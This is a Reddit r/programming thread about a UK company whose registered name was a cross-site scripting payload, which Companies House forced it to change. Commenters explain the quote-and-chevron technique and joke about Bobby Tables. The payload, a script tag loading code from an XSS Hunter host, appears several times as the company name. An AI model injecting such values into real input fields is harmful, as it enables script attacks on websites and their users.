Press J to jump to the feed. Press question mark to learn the rest of the keyboard shortcuts
3.9k

Company named "><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD forced to change its name by the Companies House

3.9k
Posted by9 months ago
Archived
WholesomeExcited2

Company named "><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD forced to change its name by the Companies House

249 comments
97% Upvoted
This thread is archived
New comments cannot be posted and votes cannot be cast
level 1
· 9m

He now says he didn’t realise that Companies House was actually vulnerable to the extremely simple technique he used, known as “cross-site scripting”, which allows an attacker to run code from one website on another.

The original name of the company was ““><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD”. By beginning the name with a quotation mark and chevron, any site which failed to properly handle the HTML code would have mistakenly thought the company name was blank, and then loaded and executed a script from the site XSS Hunter, which helps developers find cross-site scripting errors.

That script would have simply put up a harmless alert – but it serves as proof that a malicious attacker could instead have used the same weakness as a gateway to more damaging ends.

585
level 2
· 9m

we can call angle brackets chevrons? open chevron close chevron?

less than chevron, greater than chevron?

274
level 1
· 9m

THAT COMPANY WHOSE NAME USED TO CONTAIN HTML SCRIPT TAGS LTD

It's beautiful

1.0k
level 2
· 9m

Previous company names: [NAME AVAILABLE ON REQUEST FROM COMPANIES HOUSE]

Dr Michael Tandy, you have my admiration and respect.

318
level 2
· 9m

"The company formerly known as "><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD"

20
level 1
· 9m

Bobby Tables's cousin ?

690
level 2
· 9m

Bobby Tables' company, in fact.

397
level 2
· 9m

I like how the article attributes the xkcd comic with inspiring SQL injection, as if it wasn't already a known attack vector.

14
level 1
· 9m

Okay but what is that thumbnail "code"

edit: and why is that one var pink

684
level 2
· 9m

My guess is a missing parenthesis threw off the syntax highlighter

263
level 2
· 9m

Why so many firstname var's?

76
level 2
· 9m

lol they're setting firstname over and over again, who wrote this

65
level 2
· 9m

how many first names does this guy have

EDIT: also i really want to know what the isComputer function does

23
level 2
· 9m

Without being able to see the rest of the line, my guess is that they forgot a semicolon or something. You can see that document also isn't highlighted properly.

36
level 2
· 9m

They’re just making extra sure that ‘firstName’ is initialized

6
level 2
· 9m

My guess is that it's a stock photo that a non-coding designer created by cut-and-pasting some code.

5
More posts from the programming community
Continue browsing in r/programming
Computer Programming
3.5m

Members

1.8k

Online


Created Feb 28, 2006